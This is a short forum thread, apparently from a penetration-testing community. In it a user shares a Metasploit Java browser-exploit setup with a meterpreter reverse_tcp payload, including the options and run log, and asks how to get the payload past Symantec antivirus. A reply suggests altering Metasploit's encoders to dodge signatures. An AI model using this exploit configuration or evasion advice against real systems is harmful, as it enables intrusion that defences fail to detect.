Results 1 to 4 of 4

Thread: Need help with Javascript Payload - getting detected by AV

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    May 2012
    Posts
    2

    Default Need help with Javascript Payload - getting detected by AV

    hello all,

    i have a question about evading AV with javascript payload. Here is my situation:

    I am running BT 5. uname is -
    Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

    I have updated BT with msfupdate. I am using the 'exploit/multi/browser/java_atomicreferencearray' with payload=java/meterpreter/reverse_tcp. I dont have any problems running this exploit, but when the client connects, the payload is picked up by symantc antivirus as 'Trojan.Maljava!gen22'

    Here are the exploit options:
    msf exploit(java_atomicreferencearray) > show options
    Module options (exploit/multi/browser/java_atomicreferencearray):
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
    SRVPORT 8080 yes The local port to listen on.
    SSL false no Negotiate SSL for incoming connections
    SSLCert no Path to a custom SSL certificate (default is randomly generated)
    SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
    URIPATH javasploit no The URI to use for this exploit (default is random)

    Payload options (java/meterpreter/reverse_tcp):
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    LHOST 192.168.1.1 yes The listen address
    LPORT 4444 yes The listen port

    Here is the output when the exploit is run:
    msf exploit(java_atomicreferencearray) > exploit[*] Exploit running as background job.[*] Started reverse handler on 192.168.1.1:4444[*] Using URL: http://0.0.0.0:8080/javasploit3[*] Local IP: http://192.168.1.1:8080/javasploit
    msf exploit(java_atomicreferencearray) >[*] Server started.[*] 192.168.1.1 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability[*] 192.168.1.1 java_atomicreferencearray - Generated jar to drop (5287 bytes).[*] 192.168.1.1 java_atomicreferencearray - Sending jar[*] 192.168.1.1 java_atomicreferencearray - Sending jar[*] 192.168.1.1 java_atomicreferencearray - Sending jar

    I have tried using some of the 'evasion' options within the java exploit but have not had any success. My question is - is there a way to encode the payload with msfencode to successfully bypass AV detection? Let me know if you need more info. thanks in advance!

  2. #2
    Just burned his ISO
    Join Date
    May 2012
    Posts
    2

    Unhappy Re: Need help with Javascript Payload - getting detected by AV

    wow... really... no one has ever encountered this issue before?! i find that hard to believe...

  3. #3
    Junior Member
    Join Date
    Aug 2011
    Posts
    34

    Default Re: Need help with Javascript Payload - getting detected by AV

    sry drunk post...deleting

    btw i believe its the exploit itself that gets detected, not the payload
    Last edited by jnpa123; 06-03-2012 at 01:01 PM.

  4. #4
    Good friend of the forums scottm99's Avatar
    Join Date
    Feb 2010
    Location
    underwater
    Posts
    371

    Default Re: Need help with Javascript Payload - getting detected by AV

    I think it's more the fact that the AV companies are wise to the encoders used in Metasploit, and have signatures for them. If you have a good handle on Ruby, you might try taking one of the existing encoders, and modifying it (or even just inserting some random comments). This might cause enough of a change that Symantec wouldn't catch it (as it didn't match the signature).
    If I could figure out how to scuba dive & hack at the same time, there would be nothing I couldn't do...

Similar Threads

  1. WPA cracking with javascript?
    By stgram in forum OLD Wireless
    Replies: 0
    Last Post: 02-25-2010, 07:56 PM
  2. Embedded Payload (javascript)
    By sabotage in forum Beginners Forum
    Replies: 1
    Last Post: 02-16-2010, 06:18 AM
  3. Javascript Password Crack?
    By b-0yd in forum OLD Newbie Area
    Replies: 22
    Last Post: 09-16-2009, 04:58 AM
  4. Generated Payload into javascript
    By xnoor in forum OLD Pentesting
    Replies: 0
    Last Post: 07-17-2009, 04:43 PM
  5. How to run javascript exploit?
    By kazalku in forum OLD Programming
    Replies: 2
    Last Post: 07-16-2009, 11:13 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •